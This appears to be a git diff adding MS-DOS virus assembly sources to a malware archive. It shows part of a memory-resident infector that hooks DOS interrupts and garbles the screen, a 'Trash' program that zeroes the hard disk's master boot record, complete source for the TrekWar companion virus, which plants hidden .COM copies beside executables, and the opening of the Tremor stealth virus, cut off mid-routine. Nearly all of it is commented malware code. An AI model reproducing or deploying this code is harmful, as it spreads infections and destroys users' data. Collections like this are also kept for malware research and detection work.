24H offset + MOV I24_OF[SI],AX ; Save old Int 24H offset + MOV AX,CS ; Get this segment + XCHG AX,BW0092 ; Install as Int 24H segment + MOV I24_SG[SI],AX ; Save old Int 24H segment + POP ES + MOV CRTERR[SI],0 ; Clear critical error flag + RET + + ; Restore Int 24H vector + + ASSUME DS:NOTHING +BP0610: PUSH ES + XOR AX,AX ; \ Address zero + MOV ES,AX ; / + MOV AX,I24_OF[SI] ; Get old Int 24H offset + MOV BW0090,AX ; Restore Int 24H offset + MOV AX,I24_SG[SI] ; Get old Int 24H segment + MOV BW0092,AX ; Restore Int 24H segment + POP ES + ASSUME ES:NOTHING + RET + + ; Interrupt 20H routine + +BP0620: JMP BP0680 + + ; Interrupt 20H - jump to original routine + +BP0630: DB 0EAH ; Far jump to Int 20H +I20_OF DW 0136CH ; Original Int 20H offset +I20_SG DW 00291H ; Original Int 20H segment + + ; Get relocation constant in SI + +BP0640: POP BX ; Get return address + PUSH DS + PUSH AX + PUSH DS + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + CALL BP0650 ; \ Get current address +BP0650: POP SI ; / + SUB SI,OFFSET BP0650 ; Subtract displacement from it + JMP BX ; Branch to return address + + ; Free or allocate memory functions + +BP0660: CALL BP0640 ; Get relocation constant in SI + PUSH CX + MOV AX,[SI+7] ; Get host segment + MOV CX,ES ; Get relevant segment + CMP AX,CX ; Are they the same? + POP CX + POP DS + POP AX + JNE BP0670 ; Branch if different + PUSH CS ; \ Set ES to CS + POP ES ; / + CMP AH,49H ; Free memory? + JE BP0670 ; Branch if yes + ADD BX,01D0H ; Add length of installed segment +BP0670: POP DS + JMP BP0710 ; Pass on to old Int 21H + + ; Program termination (Int 20H, or functions 0 or 4CH) + +BP0680: XOR DX,DX ; Nothing to keep +BP0690: CALL BP0640 ; Get relocation constant in SI + PUSH ES + PUSH DX + CLI + CALL BP0590 ; Reset interrupts + STI + POP AX + MOV DX,01D0H ; Length of installed segment + ADD DX,AX ; Add length for host + ADD DX,10H ; Add PSP length (?) + POP ES + POP DS + POP AX + POP DS + MOV AH,31H ; Keep process function + JMP SHORT BP0710 ; Pass on to old Int 21H + + ; Interrupt 21H routine + +BP0700: CMP AH,4CH ; \ End process function? + JE BP0680 ; / + CMP AH,31H ; \ Keep process function? + JE BP0690 ; / + OR AH,AH ; \ Terminate program function? + JZ BP0680 ; / + CMP AH,49H ; \ Free allocated memory function? + JE BP0660 ; / + CMP AH,4AH ; \ Set block function? + JE BP0660 ; / + CMP AH,4BH ; \ Load function? + JE BP0730 ; / +BP0710: DB 0EAH ; Far jump to Int 21H +I21_OF DW 0138DH ; Original Int 21H offset +I21_SG DW 00291H ; Original Int 21H segment + + ; Alternate Interrupt 21H - only intercept load + +BP0720: CMP AH,4BH ; Load function? + JNE BP0710 ; Branch if not +BP0730: PUSH CX + PUSH DX + PUSH ES + PUSH BX + PUSH SI + PUSH DI + PUSH BP + CALL BP0640 ; Get relocation constant in SI + CALL BP0600 ; Set Int 24H vector +BP0740: STI + TEST BYTE PTR SWTCHB+100H,2 ; Test switch two + JNZ BP0740 ; Branch if on + CLI + TEST BYTE PTR SWTCHB+100H,2 ; Test switch two + JNZ BP0740 ; Branch if on + OR BYTE PTR SWTCHB+100H,2 ; Set on switch two + POP DS + ASSUME DS:NOTHING + MOV BX,DX ; Pathname pointer + MOV PTHDSK[SI],0FFH ; Set drive to none + CMP BYTE PTR [BX+01],':' ; Does pathname include drive? + JNE BP0750 ; Branch if not + MOV AL,[BX] ; Get drive letter + OR AL,20H ; Convert to lowercase + SUB AL,'a' ; Convert to number + MOV PTHDSK[SI],AL ; Store drive +BP0750: PUSH SI + PUSH DI + PUSH ES + CLD + MOV SI,DX ; Pathname pointer + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV DI,OFFSET DB0884+100H ; Pathname +BP0760: LODSB ; Get a character + STOSB ; Store a character + OR AL,AL ; Was that the last? + JNZ BP0760 ; Branch if not + POP ES + POP DI + POP SI + CALL BP0380 ; Process file + CALL BP0610 ; Restore Int 24H vector + AND BYTE PTR CS:SWTCHB+100H,0FDH ; Set off switch two + POP AX + POP DS + POP BP + POP DI + POP SI + POP BX + POP ES + POP DX + POP CX + JMP BP0710 ; Pass on to old Int 21H + + ; Interrupt 27H routine + +BP0770: ADD DX,0FH ; Round up + MOV CL,4 ; Bits to shift + SHR DX,CL ; Convert to paragraphs + JMP BP0690 ; Keep process + + ; Interrupt 27H - jump to original routine + +BP0780: DB 0EAH ; Far jump to Int 27H +I27_OF DW 05DFEH ; Original Int 27H offset +I27_SG DW 00291H ; Original Int 27H segment + + ; Interrupt 24H routine + +BP0790: PUSH SI + CALL BP0800 ; \ Get current location +BP0800: POP SI ; / + SUB SI,OFFSET BP0800 ; Subtract offset + OR CRTERR[SI],1 ; Set critical error flag + POP SI + XOR AL,AL ; No action + IRET + +DB086E DB 1 ; Past second line indicator + DB 0 +DB0870 DB 0 ; Characters going down switch + DB 0 +SWTCHB DB 82H ; Switch byte + ; 01 - switch one - alternate timer tick + ; 02 - switch two - processing file + ; 04 - switch three - infection count target reached + ; 08 - switch four - count two started + ; 10 - switch five - don't go to start of line + ; 20 - switch six - count two started and finished (?) + ; 40 - switch seven - count two finished + ; 80 - switch eight - video display permitted +I09_OF DW 0 ; Old Int 9 offset +I09_SG DW 0 ; Old Int 9 segment +DSPCNT DW 0FFDCH ; Display count +I09BSY DB 0 ; Int 9 busy switch +KEYTOK DB 0 ; Keyboard token +KEYNUM DB 0 ; Key number +VIDADR DW 0B800H ; Video RAM segment +RSTCNT DW 0 ; Restore count +FLENLO DW 39H ; File length, low word +FLENHI DW 0 ; File length, high word +DB0884 DB 'C:\3066\HELLO.COM', 0 ; Pathname + DB 'EXE', 0, 'E', 90H DUP (0) + +BP0820: PUSH CX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + PUSH CS ; \ Set ES to CS + POP ES ; / + CLD + TEST AL,20H ; Test switch six + JZ BP0850 ; Branch if off + TEST AL,2 ; Test switch two + JNZ BP0860 ; Branch if on + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + ASSUME DS:BOOT + MOV AL,BB0449 ; Get current VDU mode + MOV CX,0B800H ; VDU RAM address + CMP AL,7 ; Mode 7? + JNE BP0830 ; Branch if not + MOV CX,0B000H ; External mono VDU RAM + JMP SHORT BP0840 + +BP0830: CMP AL,2 ; Mode 2? + JE BP0840 ; Branch if yes + CMP AL,3 ; Mode 3? + JNE BP0860 ; Branch if not +BP0840: MOV VIDADR+100H,CX ; Save video RAM segment + OR SWTCHB+100H,2 ; Set on switch two + MOV RSTCNT+100H,0 ; Set restore count to zero + MOV DS,CX ; Address video RAM + MOV CX,80*25 ; Length to copy + XOR SI,SI ; From zero + MOV DI,OFFSET SIGNAT+100H ; To end of virus + REPZ MOVSW ; Copy video + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + MOV AX,OFFSET BP1010+100H ; Interrupt 9 routine + XCHG AX,BW0024 ; Install as Int 9 offset + MOV I09_OF+100H,AX ; Save old Int 9 offset + MOV AX,CS ; Get current segment + XCHG AX,BW0026 ; Install as Int 9 segment + MOV I09_SG+100H,AX ; Save old Int 9 segment +BP0850: MOV CX,0050H ; Length of one line + MOV AX,80*24*2 ; Last line address + MOV DI,OFFSET DW0005+100H ; Address line store + REPZ STOSW ; Store line numbers + AND SWTCHB+100H,7 ; Set off switches above three +BP0860: POP DI + POP SI + POP ES + POP DS + POP CX + JMP BP0990 ; Pass on to original Int 1CH + +BP0870: JMP BP0820 + + ; Interrupt 1CH routine + +BP0880: PUSH AX + MOV I09BSY+100H,0 ; Clear Int 9 busy switch + MOV AL,SWTCHB+100H ; Get switches + TEST AL,60H ; Test switches six and seven + JNZ BP0870 ; Branch if either is on + TEST AL,80H ; Test switch eight + JZ BP0910 ; Branch if off + CMP RSTCNT+100H,0 ; Is restore count off? + JE BP0890 ; Branch if yes + INC RSTCNT+100H ; Increment restore count + CMP RSTCNT+100H,0444H ; Have we reached target (1 minute)? + JL BP0890 ; Branch if not + CALL BP1030 ; Video display routine + JMP BP0990 ; Pass on to original Int 1CH + +BP0890: TEST AL,18H ; Test switches four and five + JZ BP0900 ; Branch if both off + DEC DSPCNT+100H ; Decrement display count + JNZ BP0900 ; Branch if not finished + AND SWTCHB+100H,0E7H ; Set off switch three + OR SWTCHB+100H,40H ; Set on switch seven + TEST AL,8 ; Test switch four + JZ BP0900 ; Branch if off + OR SWTCHB+100H,20H ; Set on switch six +BP0900: JMP BP0990 ; Pass on to original Int 1CH + +BP0910: XOR SWTCHB+100H,1 ; Toggle switch one + TEST AL,1 ; Test previous state + JZ BP0900 ; Branch if off + PUSH BX + PUSH SI + PUSH DS + MOV DS,VIDADR+100H ; Get video RAM segment + XOR SI,SI ; Start of line + MOV DB086E+100H,0 ; Set past second line off +BP0920: MOV BX,DW0005[SI+100H] ; Get current line number + OR BX,BX ; First line? + JZ BP0930 ; Branch if yes + CMP BYTE PTR [BX+SI],' ' ; Is character a blank? + JNE BP0930 ; Branch if not + CMP BYTE PTR [BX+SI+0FF60H],' ' ; Is char on line above a space? + JE BP0930 ; Branch if yes + MOV AX,0720H ; White on black space + XCHG AX,[BX+SI+0FF60H] ; Swap with line above + MOV [BX+SI],AX ; Store new character this line + ADD BX,80*2 ; Next line +BP0930: CMP BX,80*25*2 ; Past last line? + JE BP0940 ; Branch if yes + CMP BYTE PTR [BX+SI],' ' ; Is character a blank + JNE BP0940 ; Branch if not + JNE BP0970 ; ? +BP0940: MOV BX,80*24*2 ; Address last line +BP0950: CMP BYTE PTR [BX+SI],' ' ; Is character a blank? + JNE BP0960 ; Branch if not + CMP BYTE PTR [BX+SI+0FF60H],' ' ; Is char on line above a space? + JNE BP0970 ; Branch if not +BP0960: SUB BX,80*2 ; Previous line + OR BX,BX ; First line? + JNZ BP0950 ; Branch if not +BP0970: MOV DW0005[SI+100H],BX ; Save current line number + OR WORD PTR DB086E+100H,BX ; Set past second line indicator + ADD SI,2 ; Next character position + CMP SI,80*2 ; End of line? + JNE BP0920 ; Branch if not + CMP DB086E+100H,0 ; Past second line? + JNE BP0980 ; Branch if yes + OR SWTCHB+100H,80H ; Set on switch eight + MOV RSTCNT+100H,1 ; Start restore count +BP0980: POP DS + POP SI + POP BX +BP0990: POP AX + DB 0EAH ; Far jump to Int 1CH +I1C_OF DW 0FF53H ; Original Int 1CH offset +I1C_SG DW 0F000H ; Original Int 1CH segment + + ; Signal end of interrupt + +BP1000: MOV AL,20H ; \ End of interrupt + OUT 20H,AL ; / + POP AX + IRET + + ; Interrupt 9 routine + +BP1010: PUSH AX + IN AL,60H ; Get keyboard token + MOV KEYTOK+100H,AL ; Save keyboard token + IN AL,61H ; Get port B + MOV AH,AL ; Save port B + OR AL,80H ; \ Acknowledge keyboard + OUT 61H,AL ; / + MOV AL,AH ; \ Restore Port B + OUT 61H,AL ; / + CMP I09BSY+100H,0 ; Test Int 9 busy switch + MOV I09BSY+100H,1 ; Set Int 9 busy switch on + JNE BP1000 ; Branch if on already + MOV AL,KEYTOK+100H ; Get keyboard token + CMP AL,0F0H ; \ ? discard this character + JE BP1000 ; / + AND AL,7FH ; Set off top bit + CMP AL,KEYNUM+100H ; Same as last character? + MOV KEYNUM+100H,AL ; Save key number + JE BP1000 ; Branch if same as last + CMP RSTCNT+100H,0 ; Is restore count off? + JE BP1020 ; Branch if yes + MOV RSTCNT+100H,1 ; Restart restore count +BP1020: CALL BP1030 ; Video display routine + JMP BP1000 ; End of interrupt + + ; Video display routine + +BP1030: MOV DSPCNT+100H,0028H ; Set up short display count (2+ secs) + TEST SWTCHB+100H,80H ; Test switch eight + JZ BP1000 ; Branch if off + MOV DB0870+100H,1 ; Set character going down + PUSH BX + PUSH SI + PUSH DS + MOV DS,VIDADR+100H ; Get video RAM segment + TEST SWTCHB+100H,10H ; Test switch five + JNZ BP1070 ; Branch if on + OR SWTCHB+100H,10H ; Set on switch five + XOR SI,SI ; Start of line +BP1040: MOV BX,80*24*2 ; Address last line +BP1050: CMP BYTE PTR [BX+SI],' ' ; Is character a blank? + JE BP1060 ; Branch if yes + SUB BX,80*2 ; Previous line + JNB BP1050 ; Branch if not + MOV BX,80*24*2 ; Address last line +BP1060: ADD BX,80*2 ; Next line + MOV DW0005[SI+100H],BX ; Save current line number + MOV FLENLO[SI+100H],BX ; Save last line number + INC SI ; \ Next character position + INC SI ; / + CMP SI,80*2 ; End of line? + JNE BP1040 ; Branch if not +BP1070: XOR SI,SI ; Start of line +BP1080: CMP DW0005[SI+100H],80*25*2 ; End of display area? + JE BP1140 ; Branch if yes + MOV BX,FLENLO[SI+100H] ; Get last line number + MOV AX,[BX+SI] ; Get current char and attributes + CMP AX,CS:SIGNAT[BX+SI+100H] ; Is it the same as the stored copy? + JNE BP1100 ; Branch if not + PUSH BX +BP1090: OR BX,BX ; First line? + JZ BP1120 ; Restore video if yes + SUB BX,80*2 ; Previous line + CMP AX,CS:SIGNAT[BX+SI+100H] ; Is this line same as current? + JNE BP1090 ; Branch if not + CMP AX,[BX+SI] ; Is this line the same + JE BP1090 ; Branch if yes + POP BX +BP1100: OR BX,BX ; First line? + JNZ BP1110 ; Character up one line if not + MOV WORD PTR [SI],0720H ; White on black space + JMP SHORT BP1130 + + ; Move character up one line + +BP1110: MOV AX,[BX+SI] ; Get current char and attributes + MOV [BX+SI+0FF60H],AX ; Move to previous line + MOV WORD PTR [BX+SI],0720H ; White on black space + SUB FLENLO[SI+100H],80*2 ; Move last line number up one + MOV DB0870+100H,0 ; Set characters going up + JMP SHORT BP1140 + + ; Restore video + +BP1120: POP BX +BP1130: MOV BX,DW0005[SI+100H] ; Get current line number + ADD BX,80*2 ; Next line + MOV DW0005[SI+100H],BX ; Save new current line number + MOV FLENLO[SI+100H],BX ; Save last line number +BP1140: INC SI ; \ Next character position + INC SI ; / + CMP SI,80*2 ; End of line? + JNE BP1080 ; Branch if not + CMP DB0870+100H,0 ; Are characters going down + JE BP1150 ; Branch if not + PUSH ES + PUSH DI + PUSH CX + PUSH DS ; \ Set ES to DS + POP ES ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV SI,OFFSET SIGNAT+100H ; From end of virus + XOR DI,DI ; To zero + MOV CX,80*25 ; Length to copy + REPZ MOVSW ; Restore video + MOV DSPCNT+100H,0FFDCH ; Restart display count (60 mins) + AND SWTCHB+100H,4 ; Set off all switches but three + OR SWTCHB+100H,88H ; Set on switches four and eight + MOV RSTCNT+100H,0 ; Set restore count off + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + ASSUME DS:BOOT + MOV AX,I09_OF+100H ; Get old Int 9 offset + MOV BW0024,AX ; Re-install Int 9 offset + MOV AX,I09_SG+100H ; Get old Int 9 segment + MOV BW0026,AX ; Re-install Int 9 segment + POP CX + POP DI + POP ES +BP1150: POP DS + POP SI + POP BX + RET + + ; Copy virus and transfer control + +BP1160: CLD + POP AX ; Recover return address + SUB AX,SI ; Subtract source offset + ADD AX,DI ; Add target offset + PUSH ES ; Push new segment + PUSH AX ; Push new return address + REPZ MOVSB ; Copy virus + RETF ; Return to copy + + DB 090H +SIGNAT DW 0E850H + DB 0E2H, 003H, 08BH + +ENDADR EQU $ + +CODE ENDS + + END + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.trash.asm b/MSDOS/Virus.MSDOS.Unknown.trash.asm new file mode 100644 index 00000000..b979f1a9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trash.asm @@ -0,0 +1,169 @@ + page ,132 + title Trash - smashes the boot record on the first hard disk + name TRASH + + .radix 16 + +code segment + assume cs:code,ds:code + + org 100 + +CODEX equ 0C000 ; Or use 0300 when tracing DOS + +CR equ 0Dh +LF equ 0A + +start: + jmp do_it + +oldint1 dd ? +newintx dd ? +oldintx dd ? +trace db 1 +found db 0 +buffer db 200 dup (0) +message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF + db 'This program, when run, will zero (DESTROY!) the',CR,LF + db 'master boot record of your first hard disk.',CR,LF,CR,LF + db 'The purpose of this is to test the antivirus software,',CR,LF + db 'so be sure you have installed your favourite',CR,LF + db 'protecting program before running this one!',CR,LF + db "(It's almost sure it will fail to protect you anyway!)",CR,LF + db CR,LF,'Press any key to abort, or',CR,LF + db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $' +warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$' + +do_it: + mov ax,600 ; Clear the screen by scrolling it up + mov bh,7 + mov dx,1950 + xor cx,cx + int 10 + + mov ah,0F ; Get the current video mode + int 10 ; (the video page, more exactly) + + mov ah,2 ; Home the cursor + xor dx,dx + int 10 + + mov ah,9 ; Print a warning message + mov dx,offset message + int 21 + + mov ax,0C08 ; Flush the keyboard and get a char + int 21 + cmp al,0 ; Extendet ASCII? + jne quit1 ; Exit if not + mov ah,8 ; Get the key code + int 21 + cmp al,6C ; Shift-F5? + jne quit1 ; Exit if not + mov ah,2 ; Get keyboard shift status + int 16 + and al,1101b ; Ctrl-Alt-RightShift? + jnz proceed ; Proceed if so +quit1: + jmp quit ; Otherwise exit + +proceed: + mov ah,9 ; Print the last message + mov dx,offset warned + int 21 + + mov ax,3501 ; Get interrupt vector 1 (single steping) + int 21 + mov word ptr oldint1,bx + mov word ptr oldint1+2,es + + mov ax,2501 ; Set new INT 1 handler + mov dx,offset newint1 + int 21 + + mov ax,3513 ; Get interrupt vector 13 + int 21 + mov word ptr oldintx,bx + mov word ptr oldintx+2,es + mov word ptr newintx,bx + mov word ptr newintx+2,es + +; The following code is sacred in it's present form. +; To change it would cause volcanos to errupt, +; the ground to shake, and program not to run! + + mov ax,200 + push ax + push cs + mov ax,offset done + push ax + mov ax,100 + push ax + push cs + mov ax,offset faddr + push ax + mov ah,55 + iret + + assume ds:nothing + +faddr: + jmp oldintx + +newint1: + push bp + mov bp,sp + cmp trace,0 + jne search +exit: + and [bp+6],not 100 +exit1: + pop bp + iret +search: + cmp [bp+4],CODEX + jb exit1 +;Or use ja if you want to trace DOS-owned interrupt + push ax + mov ax,[bp+4] + mov word ptr newintx+2,ax + mov ax,[bp+2] + mov word ptr newintx,ax + pop ax + mov found,1 + mov trace,0 + jmp exit + + assume ds:code +done: + mov trace,0 + push ds + mov ax,word ptr oldint1+2 + mov dx,word ptr oldint1 + mov ds,ax + mov ax,2501 ; Restore old INT 1 handler + int 21 + pop ds + +; Code beyong this point is not sacred... +; It may be perverted in any manner by any pervert. + + cmp found,1 ; See if original INT 13 handler found + jne quit ; Exit if not + push ds + pop es ; Restore ES + + mov ax,301 ; Write 1 sector + mov cx,1 ; Cylinder 0, sector 1 + mov dx,80 ; Head 0, drive 80h + mov bx,offset buffer + pushf ; Simulate INT 13 + call newintx ; Do it + +quit: + mov ax,4C00 ; Exit program + int 21 + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.trekwar.asm b/MSDOS/Virus.MSDOS.Unknown.trekwar.asm new file mode 100644 index 00000000..1fa30b00 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trekwar.asm @@ -0,0 +1,185 @@ +;TREKWAR virus - we were overjoyed at Crypt Newsletter when Goose showed +;us his update of CloneWar, TrekWar. Alert readers will remember ACME, +;the musical companion based on ZENO, a relative of CloneWar. +;So here it is! +;TrekWar +;Ŀ +; Assembly Source Listing for TrekWar Companion Virus +; Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) +;Ĵ +; The TrekWar is a simple modification of the Clonewar V2 companion virus; +; for all you trekkers out there... For those of you who, heaven forbid, do +; not know what the words below mean, they are the words to the old series +; opening music of Star Trek... +; + +CSEG SEGMENT + ASSUME CS:CSEG,DS:NOTHING + + ORG 100H + +START: + jmp VIR_BEGIN ;lets get moving... + + db "",13,10 + db "",13,10 + db "Beyond",13,10 ;blah blah blah + db "The rim of the star-light",13,10 + db "My love",13,10 + db "Is wand'ring in star-flight",13,10 + db "I know",13,10 + db "He'll find in star-clustered reaches",13,10 + db "Love",13,10 + db "Strange love a star woman teaches.",13,10 + db "I know",13,10 + db "His journey ends never",13,10 + db "His star trek",13,10 + db "Will go on forever.",13,10 + db "But tell him",13,10 + db "While he wanders his starry sea",13,10 + db "Remember, remember me." + db "",13,10 + db "",13,10 + + db "[TrekWar] " ;what the heck, its only a few bytes!? +WILDCARD DB "*.EXE",0 +FILE_EXT DB "COM",0 +FILE_FOUND DB 12 DUP(' '), 0 +FILE_CREATE DB 12 DUP(' '), 0 +SEARCH_ATTRIB DW 17H +NUM_INFECT DW 0 + + +My_Cmd: +CMD_LEN DB 13 +FILE_CLONE DB 12 DUP (' '), 0 + +; +; Read all the directory filenames and store as records in buffer. +; + +Vir_begin: + + mov sp,offset STACK_HERE ;move stack down + mov bx,sp + add bx,15 + mov cl,4 + shr bx,cl + mov ah,4ah ;deallocate rest of memory + int 21h + + mov di,OFFSET FILE_CLONE ;Point to buffer. + mov si,OFFSET FILE_FOUND + mov cx,12 + rep movsb + +Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search + mov cx,SEARCH_ATTRIB + + mov ah,4Eh ;find first matching file + int 21h + + jc EXIT ;If empty directory, exit + +; + +Store_name: + + mov di,OFFSET FILE_FOUND ;Point to buffer. + mov si,158 ;stow the file found in buffer + mov cx,12 + rep movsb + + mov di,OFFSET FILE_CREATE ;Point to buffer. + mov si,158 + mov cx,12 + rep movsb + + cld + mov di,OFFSET FILE_CREATE + mov al,'.' + mov cx,9 + repne scasb ;find the '.' + + mov si,OFFSET FILE_EXT + mov cx,3 + rep movsb ;replace the .EXE with .COM + ;from buffer + +; + +Check_file: ;does the file exist? + mov dx,OFFSET FILE_CREATE + xor cx,cx + mov ax,3d00h ;Open file, read only + int 21h + jnc find_next + +; +Infect_file: ;create companion routine + + mov dx,OFFSET FILE_CREATE ;contains name of "companion" + xor cx,cx + mov ah,3ch ;construct file + int 21h + jc EXIT + + ;Write virus to companion file + xchg bx,ax + mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length + mov dx,OFFSET START + mov ah,40h ;write to file function + int 21h ;do it + + ;Close file + mov ah,3eh ;assumes bx still has file handle + int 21h + + ;Change attributes + mov dx,OFFSET FILE_CREATE ;of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + jmp prepare_command + +; +;...findnext... +; +find_next: + mov ah, 4fh ;find next... + int 21h + jmp store_name +; +Prepare_command: + + cld + mov di,OFFSET FILE_CLONE + mov al,0 + mov cx,12 + repne scasb ;find the end of string \0 + + mov al,0Dh ; + stosb ;replace \0 with a + + mov ax,12 ;store length of the command + sub ax,cx + mov CMD_LEN, al + +; + +Exit: + ;Run the original program + mov si, OFFSET MY_CMD + int 2Eh ;Pass command to command + ;interpreter for execution + mov ax,4C00H ;Exit to DOS + int 21h + + +END_OF_CODE = $ + +STACK_HERE EQU END_OF_CODE + 512 + +CSEG ENDS + END START + diff --git a/MSDOS/Virus.MSDOS.Unknown.tremor.asm b/MSDOS/Virus.MSDOS.Unknown.tremor.asm new file mode 100644 index 00000000..1507ceaf --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tremor.asm @@ -0,0 +1,2266 @@ +;-------------------------------------------------------------------------- +;-- +;-- TREMOR +;-- +;-- you can reassemble it, but the cod will not run. +;-- i have had no time to make it work (and there is no need for) +;-- but you will see, how tremor works. +;-- +;-------------------------------------------------------------------------- +paras_needed equ 10ch + +old__ds equ offset old__si-23 +old__es equ offset old__si-17 +old__ax equ offset old__si-12 +old__bx equ offset old__si-9 +old__cx equ offset old__si-6 +old__dx equ offset old__si-3 +old__di equ offset old__si+3 +old__bp equ offset old__si+6 + +dtastruc struc + reserv db 15h dup (?) + attr db ? + time dw ? + date dw ? + fsize dd ? + fname db 13 dup (?) +ends + +;-------------------------------------------------------------------------- +code_seg segment + assume cs:code_seg +;------------------------------------------------------------------- + org 0 ; !! +flag db ? + db 85h dup (?) +;------------------------------------------------------------------- +internal_21 dd ? + dd ? +tremor_24 dd ? +tremor_21 dd ? + +orig21 dd ? +internal_15 dd ? +tremor_15 dd ? +tempdta: + xres db 15h dup (?) + xattr db ? + xtime dw ? + xdate dw ? + xsize dd ? + xfname db 13 dup (?) +;------------------------------------------------------------ +extra dw ? ; +;------------------------------------------------------------------- +start: mov di,offset frstbyte+100h ; psp segment !! + and ax,ax +init_bx equ $+1 + mov bx,0 + mov cx,891h + push ds + pop es +locloop_3: xor [di],bx + sti + add bx,0 + sub di,-2 + loop locloop_3 + nop +frstbyte: jmp virinstall + db 0ebh,0bh + nop + nop + nop + jmp virinstall +;------------------------------------------------------------------- +virint21done: call getorigregs +loc_5: jmp toold21 + +virint21: cmp byte ptr cs:[BP_Flag],1 ; "disabled" + je loc_5 + + mov word ptr cs:[offset old__si],si + mov si,offset old__si + mov cs:[si+(offset old__ds-offset old__si)],ds + push cs + pop ds + mov ds:[si+(old__ax)],ax + mov ds:[si+(old__bx)],bx + mov ds:[si+(old__cx)],cx + mov ds:[si+(old__dx)],dx + mov ds:[si+(old__di)],di + mov ds:[si+(old__bp)],bp + mov ds:[si+(old__es)],es + + cmp byte ptr ds:[si+(offset flickerflag-offset old__si)],1 +psycholabel: jmp loc_8 + + add al,ah + and al,0fh + add ah,al + and ah,0fh + push ax + mov dx,3dah + in al,dx + pop bx + mov al,8 + mov ah,bl + mov dl,0d4h + out dx,ax + mov dl,0c0h + mov al,33h + out dx,al + mov al,bh + out dx,al + call getorigregs + push ax + xor cx,cx + mov al,0b6h + out 43h,al + mov cl,ah + shl al,1 + shl cx,1 + in al,61h + push ax + or al,3 + out 61h,al + +locloop_7: loop locloop_7 + + pop ax + out 61h,al + pop ax + +loc_8: cmp ah,57h ; get/set filestamp + je handlefkts + cmp ah,42h ; seek in file + je handlefkts + + cmp ah,3fh ; read file + db 74h ; JZ +disablhndchk db offset chkflhandl-offset $+2 + cmp ah,50h ; set psp + jb loc_9 + + cmp ah,6ch ; ext. create + jb loc_13 +loc_9: cmp ah,30h ; get dos-version.... + jne loc_11 ; normally 1st call of each prog ! + +chkflhandl: cmp bl,4 ; diskfile ? + ja handlefkts + +loc_11: cmp ah,3ch ; create/overwrite file + ja loc_12 + cmp ah,12h ; findnext /fcb + ja loc_13 +loc_12: cmp ah,0eh ; set curr. disk + ja handlefkts + +loc_13: jmp virint21done + +;------------------------------------------------------------- +; file-handle operations +;------------------------------------------------------------- +handlefkts: xor bx,bx + call checkforvsafe + mov byte ptr cs:[org4ad],cl + mov al,0 + call set_com_flag + + mov al,15h ; get int 15h + mov di,offset tremor_15 + call getint + mov di,offset internal_15 ; set int 15h + call setint + + mov al,21h ; get int 21h + mov di,offset tremor_21 + call getint + mov di,offset internal_21 ; set int 21h + call setint + + mov al,24h ; get int 24h + mov di,offset tremor_24 + call getint + + mov dx,posint24 + + push cs ; set int 24h + pop ds + call setint1 + + call getorigregs +;------------------------------------------------------------------- +; read file via handle +;------------------------------------------------------------------- + cmp ah,3fh + je fktreadhndl + jmp loc_24 + +fktreadhndl: jcxz loc_16 ; "nothing to do" + ; + mov ax,5700h ; get filestamp (infected..) + call performint21 + jc loc_16 ; error ->... bye + cmp dh,0c7h ; dh > c7 -> infected + ja loc_17 +loc_16: jmp chain + +loc_17: call readfirstbytes + jc loc_16 + call checkifinfected + jnz loc_16 + ; + call trem_popall + mov bx,word ptr cs:[filesize ] + mov dx,word ptr cs:[filesize+2] + call chkfilesize + ja loc_18 + + add bx,cx + adc dx,0 + call chkfilesize + jbe loc_19 + + sub bx,word ptr cs:[data_x01] + sub bx,cx + neg bx + push bx + jmp loc_20 + +loc_18: xor cx,cx +loc_19: push cx +loc_20: call getorigregs + pop cx + call performint21 + jc loc_23 + + pushf + push ax + push si + push di + push ds + push es + push ds + pop es + + push cs + pop ds + + mov di,word ptr ds:filesize + cmp word ptr ds:[di+3],0 ; check hi-word of filesize + ja loc_22 ; > 64kb -> bye + + cmp word ptr [di],18h ; check lo-word of filesize + jae loc_22 ; > 24 byte -> jmp + + mov ax,[di] ; ( error ?!?) + mov di,dx + mov si,ax + add si,offset buffer + cmp cx,18h + jb loc_21 + sub ax,18h + neg ax + xchg ax,cx +loc_21: cld + rep movsb +loc_22: pop es + pop ds + pop di + pop si + pop ax + popf +loc_23: jmp loc_27 +;------------------------------------------------------------------- +; seek to end of file / handle +;------------------------------------------------------------------- +loc_24: cmp ax,4202h + jne loc_28 + + mov ax,5700h ; get timestamp + call performint21 + jnc loc_26 +chain: jmp chaintoint21 + +loc_26: cmp dh,200 ; dh < 0c8 -> not infected + jb chain + call readfirstbytes + jc chain + call checkifinfected + jnz chain + call trem_popall + pushf + sub dx,4000 ; seek to "real" end of file... + sbb cx,0 ; cx:dx ist position from eof + popf + call performint21 +loc_27: mov cx,word ptr cs:[old__cx] ; + jmp back +;------------------------------------------------------------------- +; get/set memblock +;------------------------------------------------------------------- +loc_28: db 0ebh +enablegetmem db offset loc_31-offset $+2 ; jmp short loc_31 + + cmp ah,4ah ; set mem-block + je loc_29 + cmp ah,48h ; get mem + jne loc_31 + +loc_29: call trem_popall + call performint21 + jnc back ; + cmp al,8 ; "out of memory" ! + jne back ; + sub bx,paras_needed ; amount of possible memory + stc ; to request... +back: jmp backtocaller +;------------------------------------------------------------------ +; findfirst / findnext via handle +;------------------------------------------------------------------ +loc_31: db 0ebh +enablehandle db 0 + + cmp ah,4eh + jb loc_37 + cmp ah,4fh + ja loc_37 + + call performint21 ; do it and check result.. + pushf + push ax + jc goback + + call getdta ; -> dta=es:bx , + ; al = c8 + cmp byte ptr 